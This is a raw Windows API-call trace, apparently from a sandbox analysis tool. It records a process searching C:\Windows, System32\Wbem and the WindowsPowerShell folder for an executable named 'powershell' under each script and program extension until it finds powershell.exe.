	[0743.814] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.815] SetErrorMode (uMode=0x1) returned 0x1
	[0743.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.815] SetErrorMode (uMode=0x1) returned 0x1
	[0743.815] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.815] SetErrorMode (uMode=0x1) returned 0x1
	[0743.816] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.816] SetErrorMode (uMode=0x1) returned 0x1
	[0743.816] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.816] SetErrorMode (uMode=0x1) returned 0x1
	[0743.816] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.817] SetErrorMode (uMode=0x1) returned 0x1
	[0743.817] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.817] SetErrorMode (uMode=0x1) returned 0x1
	[0743.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.817] SetErrorMode (uMode=0x1) returned 0x1
	[0743.817] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.818] SetErrorMode (uMode=0x1) returned 0x1
	[0743.818] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.818] SetErrorMode (uMode=0x1) returned 0x1
	[0743.818] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.818] SetErrorMode (uMode=0x1) returned 0x1
	[0743.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.819] SetErrorMode (uMode=0x1) returned 0x1
	[0743.819] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.819] SetErrorMode (uMode=0x1) returned 0x1
	[0743.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.820] SetErrorMode (uMode=0x1) returned 0x1
	[0743.820] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.820] SetErrorMode (uMode=0x1) returned 0x1
	[0743.820] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.820] SetErrorMode (uMode=0x1) returned 0x1
	[0743.821] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.821] SetErrorMode (uMode=0x1) returned 0x1
	[0743.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.821] SetErrorMode (uMode=0x1) returned 0x1
	[0743.821] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.822] SetErrorMode (uMode=0x1) returned 0x1
	[0743.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.822] SetErrorMode (uMode=0x1) returned 0x1
	[0743.822] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.822] SetErrorMode (uMode=0x1) returned 0x1
	[0743.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.823] SetErrorMode (uMode=0x1) returned 0x1
	[0743.823] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.823] SetErrorMode (uMode=0x1) returned 0x1
	[0743.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.824] SetErrorMode (uMode=0x1) returned 0x1
	[0743.824] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.824] SetErrorMode (uMode=0x1) returned 0x1
	[0743.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.824] SetErrorMode (uMode=0x1) returned 0x1
	[0743.824] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.825] SetErrorMode (uMode=0x1) returned 0x1
	[0743.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.825] SetErrorMode (uMode=0x1) returned 0x1
	[0743.825] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.826] SetErrorMode (uMode=0x1) returned 0x1
	[0743.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.826] SetErrorMode (uMode=0x1) returned 0x1
	[0743.826] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.826] SetErrorMode (uMode=0x1) returned 0x1
	[0743.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.827] SetErrorMode (uMode=0x1) returned 0x1
	[0743.827] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.827] SetErrorMode (uMode=0x1) returned 0x1
	[0743.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.827] SetErrorMode (uMode=0x1) returned 0x1
	[0743.828] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.828] SetErrorMode (uMode=0x1) returned 0x1
	[0743.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.828] SetErrorMode (uMode=0x1) returned 0x1
	[0743.828] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.829] SetErrorMode (uMode=0x1) returned 0x1
	[0743.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0743.829] SetErrorMode (uMode=0x1) returned 0x1
	[0743.829] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.829] SetErrorMode (uMode=0x1) returned 0x1
	[0745.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0745.217] SetErrorMode (uMode=0x1) returned 0x1
	[0745.217] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.217] SetErrorMode (uMode=0x1) returned 0x1
	[0745.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0745.217] SetErrorMode (uMode=0x1) returned 0x1
	[0745.217] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.218] SetErrorMode (uMode=0x1) returned 0x1
	[0745.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0745.218] SetErrorMode (uMode=0x1) returned 0x1
	[0745.218] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.219] SetErrorMode (uMode=0x1) returned 0x1
	[0745.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0745.219] SetErrorMode (uMode=0x1) returned 0x1
	[0745.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.219] SetErrorMode (uMode=0x1) returned 0x1
	[0745.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0745.220] SetErrorMode (uMode=0x1) returned 0x1
	[0745.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.220] SetErrorMode (uMode=0x1) returned 0x1
	[0745.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0745.220] SetErrorMode (uMode=0x1) returned 0x1
	[0745.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.221] SetErrorMode (uMode=0x1) returned 0x1
	[0745.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0745.221] SetErrorMode (uMode=0x1) returned 0x1
	[0745.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.222] SetErrorMode (uMode=0x1) returned 0x1
	[0745.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0745.222] SetErrorMode (uMode=0x1) returned 0x1
	[0745.223] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.223] SetErrorMode (uMode=0x1) returned 0x1
	[0745.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0745.223] SetErrorMode (uMode=0x1) returned 0x1
	[0745.223] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1ba342f0
	[0745.224] FindNextFileW (in: hFindFile=0x1ba342f0, lpFindFileData=0x1c8bded0 | out: lpFindFileData=0x1c8bded0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0745.224] FindClose (in: hFindFile=0x1ba342f0 | out: hFindFile=0x1ba342f0) returned 1
	[0745.225] SetErrorMode (uMode=0x1) returned 0x1
